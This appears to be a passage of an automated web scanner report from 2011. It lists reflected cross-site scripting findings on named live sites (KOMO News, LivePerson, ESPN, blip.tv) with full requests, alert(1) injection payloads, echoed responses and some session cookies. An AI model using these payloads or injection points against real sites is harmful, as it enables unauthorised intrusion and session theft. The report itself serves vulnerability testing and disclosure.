Set-Cookie: .ASPXANONYMOUS=_IvWOUAKzAEkAAAAZmQyMjEzZTUtMmM2OS00MTE5LWJjZDctNDU1ZTI1ZTQ5OWUwH664_BbROqxQXMQjructrXLWTLI1; expires=Wed, 04-May-2011 09:47:05 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:07:05 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Alaskan Way Viaduct News</title>
   <meta http-equiv="X-UA-Compatible" conten
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1&ename=rsspage" />
...[SNIP]...

3.329. http://search.komonews.com/default.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 800ef<script>alert(1)</script>802ab134ff2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct800ef<script>alert(1)</script>802ab134ff2 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct+800+e%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2&cq=alaskan+way+viaduct800ef%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16006
Set-Cookie: .ASPXANONYMOUS=4KApLUAKzAEkAAAAZDE4MjJmMDQtMGFjNi00NDdjLWEwYzEtMzY3NGRhM2NkMGQyHZX1RYPJpm0WtbgAPpNgmu8k3vc1; expires=Wed, 04-May-2011 09:46:43 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:43 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>&quot;alaskan way viaduct 800 e&lt;script&gt;alert 1 &lt; script&gt;802ab13
...[SNIP]...
<div class="noresults">No results found for &quot;alaskan way viaduct800ef<script>alert(1)</script>802ab134ff2&quot; or &quot;alaskan way viaduct 800 e&lt;script&gt;alert(1)&lt;/script&gt;802ab134ff2&quot;.</div>
...[SNIP]...

3.330. https://server.iad.liveperson.net/hc/14598237/ [divID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /hc/14598237/

Issue detail

The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9432a'%3balert(1)//c0ea75e1430 was submitted in the divID parameter. This input was echoed as 9432a';alert(1)//c0ea75e1430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hc/14598237/?cmd=mTagRepstate&site=14598237&buttonID=15&divID=lpButDivID-13013362139432a'%3balert(1)//c0ea75e1430&bt=3&c=1 HTTP/1.1
Host: server.iad.liveperson.net
Connection: keep-alive
Referer: http://www.reputation.com/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8031612796209450195; LivePersonID=-16601209214853-1303177645:-1:1303177658:-1:-1; HumanClickCHATKEY=8250723888827042337; HumanClickSiteContainerID_14598237=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303177753362

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:56:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Set-Cookie: HumanClickSiteContainerID_14598237=STANDALONE; path=/hc/14598237
Set-Cookie: LivePersonID=-16601209214853-1303177645:-1:1303177658:-1:-1; expires=Wed, 18-Apr-2012 01:56:10 GMT; path=/hc/14598237; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 18338

function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T
...[SNIP]...
tatic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13031781709976276341300234937596 = new staticButton('lpMTagStatic.lpStaticBut13031781709976276341300234937596','lpButDivID-13013362139432a';alert(1)//c0ea75e1430','Link 03/24 for Saurabh',15,{'id':15,'name':"Link 03/24 for Saurabh",chanel:1,enabled:true,buttonType:3,voiceType:-1,stickyType:1,description:"Link 03/24 for Saurabh",buttonContent:1,addTextToButton:
...[SNIP]...

3.331. http://soccernet.espn.go.com/team [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0321"%3balert(1)//d2fdfaa962c was submitted in the cc parameter. This input was echoed as c0321";alert(1)//d2fdfaa962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /team?id=190&cc=5901c0321"%3balert(1)//d2fdfaa962c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:47 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Set-Cookie: SWID=9C26EDED-89CF-48C8-B3F7-8885D279085F; path=/; expires=Wed, 23-Feb-2031 23:06:47 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:47 GMT
Content-Length: 27184
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:47 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901c0321";alert(1)//d2fdfaa962c",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

3.332. http://soccernet.espn.go.com/team [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563e2"><script>alert(1)</script>a0867662a73 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /team?id=190&cc=5901563e2"><script>alert(1)</script>a0867662a73 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:46 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Set-Cookie: SWID=0080C2D3-BF04-4C91-85A0-65F5A6E54CD3; path=/; expires=Wed, 23-Feb-2031 23:06:46 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:46 GMT
Content-Length: 27281
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:46 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901563e2"><script>alert(1)</script>a0867662a73",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

3.333. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f1e'%3balert(1)//c148b0a504b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f1e';alert(1)//c148b0a504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?a5f1e'%3balert(1)//c148b0a504b=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54394
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1716121387
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourcebarcelona2010.blip.tv/rss?sort=custom;page=1;date=;a5f1e';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;a5f1e\';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           
       
   </script>
...[SNIP]...

3.334. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65992"><script>alert(1)</script>7d42614a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?65992"><script>alert(1)</script>7d42614a729=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54475
Date: Tue, 19 Apr 2011 19:48:15 GMT
X-Varnish: 1342697601
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=custom;date=;user=sourcebarcelona2010;s=posts;65992"><script>alert(1)</script>7d42614a729=1;page=2">
...[SNIP]...

3.335. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6a5"><script>alert(1)</script>1e232d81774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?bf6a5"><script>alert(1)</script>1e232d81774=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53436
Date: Tue, 19 Apr 2011 19:47:50 GMT
X-Varnish: 941599355
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;date=;bf6a5"><script>alert(1)</script>1e232d81774=1;user=sourceboston2008;s=posts;page=2">
...[SNIP]...

3.336. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a96b9'%3balert(1)//ac16476f5de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a96b9';alert(1)//ac16476f5de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?a96b9'%3balert(1)//ac16476f5de=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53340
Date: Tue, 19 Apr 2011 19:47:52 GMT
X-Varnish: 723153243
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2008.blip.tv/rss?a96b9';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           window.generic_feed_uri = 'a96b9\';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           
       
   </script>
...[SNIP]...

3.337. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282e3"><script>alert(1)</script>0b14ceaf125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?282e3"><script>alert(1)</script>0b14ceaf125=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 55008
Date: Tue, 19 Apr 2011 19:48:17 GMT
X-Varnish: 1716121237
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;282e3"><script>alert(1)</script>0b14ceaf125=1;date=;user=sourceboston2009;s=posts;page=2">
...[SNIP]...

3.338. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f00'%3balert(1)//ce990a6fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22f00';alert(1)//ce990a6fdd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?22f00'%3balert(1)//ce990a6fdd2=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54897
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1427563464
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2009.blip.tv/rss?sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00';alert(1)//ce990a6fdd2=1';
           window.generic_feed_uri = 'sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00\';alert(1)//ce990a6fdd2=1';
           
       
   </script>
...[SNIP]...

3.339. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2b"><script>alert(1)</script>973845e00e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?3ca2b"><script>alert(1)</script>973845e00e3=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54010
Date: Tue, 19 Apr 2011 19:47:48 GMT
X-Varnish: 941599049
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?3ca2b"><script>alert(1)</script>973845e00e3=1;sort=custom;date=;user=sourceboston2010;s=posts;page=2">
...[SNIP]...

3.340. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eccf8'%3balert(1)//75f0ef58d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eccf8';alert(1)//75f0ef58d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?eccf8'%3balert(1)//75f0ef58d87=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53899
Date: Tue, 19 Apr 2011 19:47:49 GMT
X-Varnish: 441991143
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2010.blip.tv/rss?sort=custom;page=1;date=;eccf8';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;eccf8\';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           
       
   </script>
...[SNIP]...

3.341. http://sports.espn.go.com/chicago/nba/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload de58b--><script>alert(1)</script>a255c6a6a00 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:21:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:21:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 26 Feb 2011 02:22:50 GMT
Content-Length: 48139
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Coaching Chicago Bu
...[SNIP]...
<!--url:/chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046-->
...[SNIP]...

